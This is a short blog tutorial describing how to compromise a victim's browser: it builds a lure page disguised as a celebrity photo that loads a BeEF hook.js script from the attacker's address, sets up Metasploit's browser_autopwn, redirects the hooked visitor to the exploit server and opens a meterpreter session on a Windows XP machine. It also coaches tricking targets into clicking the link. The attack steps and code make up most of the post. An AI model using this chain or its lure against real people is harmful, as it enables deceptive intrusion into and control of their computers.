Posted by shinigami at 11:58
Read our previous post
Heiyo, today we will learn about pwned victim from browser. My scenario is :- Make user visit our page, with SocialEngineering
- Setup BeEF
- Setup Metasploit browser_autopwn
- Play and Pwned
#1. Social Engineering
Social Engineering with the best plan will result the best thing. I have plan to make link to the target. Of course the link must create interest. In this case I will create page with contain Ayana images (JKT48 personel). She is a beauty girl, so the target victim is Male of course. Hehe
Prepare the Ayana images, named cantik.jpg
Lets create the page with code below :
<html> <head> <title>Ayana.jpg</title> <script src="http://192.168.56.101:3000/hook.js"></script> <!-- file JS from BeEF --> </head> <body> <img src="cantik.jpg" /> </body> </html>Save as this file with named index.html
Place the file into this directory /var/www/ayana.jpg/
* 192.168.56.101 is our ip address (attacker machine)
* ayana.jpg is directory, its to make the uri look a like addressed to images file.
Run your apache service, to make it work.
#2. Setup BeEF
Run the BeEF from Backtrack Tools->Exploitation->Social Engineering->BeEFOpen the panel of BeEF using your browser here http://127.0.0.1:3000/ui/panel
Now, give the target address http://192.168.56.101/ayana.jpg
You can use your favorite technique to gives the link, may be you can say that "Hei bro, look the beautiful girl here http://192.168.56.101/ayana.jpg"
Back into BeEF panel to monitor your target.
Here, my target running Windows XP SP3 with IE 8 installed.
#3. Setup Metasploit browser_autopwn
Before I have read about browser_autopwn on metasploit (here), so I have idea to do that on my scenario.Open msfconsole, then type :
msf > use auxiliary/server/browser_autopwn
Show the options for this auxiliary, type :
msf auxiliary(browser_autopwn) > show options
set the LHOST with our IP address (attacker machine), type:
msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
Run the auxiliary, type :
msf auxiliary(browser_autopwn) > run
Wait until you see that
At this point, we need to notes the exploit address. http://192.168.56.101/paVleLsD
* 192.168.56.101 is our ip (attacker machine)
#4. Lets play the game
Ok, the resume of scenarios is :- Give the target some of url with contain images. http://192.168.56.101/ayana.jpg
When vitctim access this page, he/she will see it :
- After that, back into BeEF panel and see what happens on that
The attacker was connected to BeEF with IE 8. Now redirect the victim into metasploit. See the image below for detail.
As we can see that the metasploit was successfully gaining access into windows system.
Now, check the session on metasploit with command :
sessions -lConnect to windows using meterpreter. Type :
sessions -i 2* 2 is id of sessions on metasploit
No comments:
Post a Comment